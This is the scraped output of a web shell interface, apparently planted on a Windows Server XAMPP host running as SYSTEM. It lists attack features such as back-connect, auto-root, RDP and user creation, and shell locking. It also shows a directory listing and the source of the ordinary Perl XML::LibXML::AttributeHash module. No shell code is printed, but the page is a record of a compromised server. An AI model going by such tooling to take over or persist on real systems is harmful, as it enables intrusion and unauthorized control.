Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
XML /
LibXML /
[ HOME SHELL ]
Name
Size
Permission
Action
SAX
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Attr.pod
4.02
KB
-rw-rw-rw-
AttributeHash.pm
4.49
KB
-rw-rw-rw-
Boolean.pm
1.56
KB
-rw-rw-rw-
CDATASection.pod
1.28
KB
-rw-rw-rw-
Comment.pod
1.36
KB
-rw-rw-rw-
Common.pm
8.22
KB
-rw-rw-rw-
Common.pod
3.59
KB
-rw-rw-rw-
DOM.pod
6.23
KB
-rw-rw-rw-
Devel.pm
4.91
KB
-rw-rw-rw-
Document.pod
20.91
KB
-rw-rw-rw-
DocumentFragment.pod
819
B
-rw-rw-rw-
Dtd.pod
1.99
KB
-rw-rw-rw-
Element.pod
13.48
KB
-rw-rw-rw-
ErrNo.pm
27.83
KB
-rw-rw-rw-
ErrNo.pod
591
B
-rw-rw-rw-
Error.pm
8.47
KB
-rw-rw-rw-
Error.pod
5.98
KB
-rw-rw-rw-
InputCallback.pod
9.59
KB
-rw-rw-rw-
Literal.pm
2.04
KB
-rw-rw-rw-
Namespace.pod
3.28
KB
-rw-rw-rw-
Node.pod
25.39
KB
-rw-rw-rw-
NodeList.pm
7.31
KB
-rw-rw-rw-
Number.pm
1.87
KB
-rw-rw-rw-
PI.pod
2.22
KB
-rw-rw-rw-
Parser.pod
27.79
KB
-rw-rw-rw-
Pattern.pod
2.91
KB
-rw-rw-rw-
Reader.pm
5.75
KB
-rw-rw-rw-
Reader.pod
17.6
KB
-rw-rw-rw-
RegExp.pod
1.54
KB
-rw-rw-rw-
RelaxNG.pod
2.34
KB
-rw-rw-rw-
SAX.pm
3.06
KB
-rw-rw-rw-
SAX.pod
1.76
KB
-rw-rw-rw-
Schema.pod
2.19
KB
-rw-rw-rw-
Text.pod
5.47
KB
-rw-rw-rw-
XPathContext.pm
3.15
KB
-rw-rw-rw-
XPathContext.pod
11.49
KB
-rw-rw-rw-
XPathExpression.pod
1.64
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AttributeHash.pm
package XML::LibXML::AttributeHash; use strict; use warnings; use Scalar::Util qw//; use Tie::Hash; our @ISA = qw/Tie::Hash/; use vars qw($VERSION); $VERSION = "2.0205"; # VERSION TEMPLATE: DO NOT CHANGE BEGIN { *__HAS_WEAKEN = defined(&Scalar::Util::weaken) ? sub () { 1 } : sub () { 0 }; }; sub element { return $_[0][0]; } sub from_clark { my ($self, $str) = @_; if ($str =~ m! \{ (.+) \} (.+) !x) { return ($1, $2); } return (undef, $str); } sub to_clark { my ($self, $ns, $local) = @_; defined $ns ? "{$ns}$local" : $local; } sub all_keys { my ($self, @keys) = @_; my $elem = $self->element; foreach my $attr (defined($elem) ? $elem->attributes : ()) { if (! $attr->isa('XML::LibXML::Namespace')) { push @keys, $self->to_clark($attr->namespaceURI, $attr->localname); } } return sort @keys; } sub TIEHASH { my ($class, $element, %args) = @_; my $self = bless [$element, undef, \%args], $class; if (__HAS_WEAKEN and $args{weaken}) { Scalar::Util::weaken( $self->[0] ); } return $self; } sub STORE { my ($self, $key, $value) = @_; my ($key_ns, $key_local) = $self->from_clark($key); if (defined $key_ns) { return $self->element->setAttributeNS($key_ns, "xxx:$key_local", "$value"); } else { return $self->element->setAttribute($key_local, "$value"); } } sub FETCH { my ($self, $key) = @_; my ($key_ns, $key_local) = $self->from_clark($key); if (defined $key_ns) { return $self->element->getAttributeNS($key_ns, "$key_local"); } else { return $self->element->getAttribute($key_local); } } sub EXISTS { my ($self, $key) = @_; my ($key_ns, $key_local) = $self->from_clark($key); if (defined $key_ns) { return $self->element->hasAttributeNS($key_ns, "$key_local"); } else { return $self->element->hasAttribute($key_local); } } sub DELETE { my ($self, $key) = @_; my ($key_ns, $key_local) = $self->from_clark($key); if (defined $key_ns) { return $self->element->removeAttributeNS($key_ns, "$key_local"); } else { return $self->element->removeAttribute($key_local); } } sub FIRSTKEY { my ($self) = @_; my @keys = $self->all_keys; $self->[1] = \@keys; if (wantarray) { return ($keys[0], $self->FETCH($keys[0])); } $keys[0]; } sub NEXTKEY { my ($self, $lastkey) = @_; my @keys = defined $self->[1] ? @{ $self->[1] } : $self->all_keys; my $found; foreach my $k (@keys) { if ($k gt $lastkey) { $found = $k and last; } } if (!defined $found) { $self->[1] = undef; return; } if (wantarray) { return ($found, $self->FETCH($found)); } return $found; } sub SCALAR { my ($self) = @_; return $self->element; } sub CLEAR { my ($self) = @_; foreach my $k ($self->all_keys) { $self->DELETE($k); } return $self; } __PACKAGE__ __END__ =head1 NAME XML::LibXML::AttributeHash - tie an XML::LibXML::Element to a hash to access its attributes =head1 SYNOPSIS tie my %hash, 'XML::LibXML::AttributeHash', $element; $hash{'href'} = 'http://example.com/'; print $element->getAttribute('href') . "\n"; =head1 DESCRIPTION This class allows an element's attributes to be accessed as if they were a plain old Perl hash. Attribute names become hash keys. Namespaced attributes are keyed using Clark notation. my $XLINK = 'http://www.w3.org/1999/xlink'; tie my %hash, 'XML::LibXML::AttributeHash', $element; $hash{"{$XLINK}href"} = 'http://localhost/'; print $element->getAttributeNS($XLINK, 'href') . "\n"; There is rarely any need to use XML::LibXML::AttributeHash directly. In general, it is possible to take advantage of XML::LibXML::Element's overloading. The example in the SYNOPSIS could have been written: $element->{'href'} = 'http://example.com/'; print $element->getAttribute('href') . "\n"; The tie interface allows the passing of additional arguments to XML::LibXML::AttributeHash: tie my %hash, 'XML::LibXML::AttributeHash', $element, %args; Currently only one argument is supported, the boolean "weaken" which (if true) indicates that the tied object's reference to the element should be a weak reference. This is used by XML::LibXML::Element's overloading. The "weaken" argument is ignored if you don't have a working Scalar::Util::weaken.
Close